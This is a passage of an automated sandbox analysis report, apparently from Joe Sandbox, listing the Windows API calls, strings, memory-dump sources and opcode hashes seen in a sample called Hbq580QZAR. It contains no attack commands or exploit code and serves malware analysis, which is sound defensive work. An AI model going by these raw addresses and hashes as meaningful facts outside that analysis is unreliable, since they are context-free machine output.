                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                            Strings
                                                                                            • NumRecs range exceeded, xrefs: 0045C396
                                                                                            • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlush
                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                            • API String ID: 3593489403-659731555
                                                                                            • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                            • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                            • String ID: hX
                                                                                            • API String ID: 296031713-463809249
                                                                                            • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                            • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                            • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                            • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                            APIs
                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                              • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                              • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                              • Part of subcall function 004063C4: 6FAA1CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                              • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                              • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                              • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                              • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                              • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                              • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                              • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                              • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                              • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                              • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                              • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                              • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                              • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                              • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                              • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                              • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                            • String ID: Setup
                                                                                            • API String ID: 504348408-3839654196
                                                                                            • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                            • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: $=H
                                                                                            • API String ID: 3660427363-3538597426
                                                                                            • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                            • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                            • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                            APIs
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                              • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                              • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                            • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                            • API String ID: 3869789854-2936008475
                                                                                            • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                            • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                            • API String ID: 3535843008-1113070880
                                                                                            • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                            • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                            • String ID: CreateFile
                                                                                            • API String ID: 2528220319-823142352
                                                                                            • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                            • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                            • API String ID: 71445658-2565060666
                                                                                            • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                            • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                            APIs
                                                                                              • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                            • API String ID: 2906209438-2320870614
                                                                                            • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                            • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                            APIs
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2492108670-2683653824
                                                                                            • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                            • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 2574300362-0
                                                                                            • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                            • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Append$System
                                                                                            • String ID:
                                                                                            • API String ID: 1489644407-0
                                                                                            • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
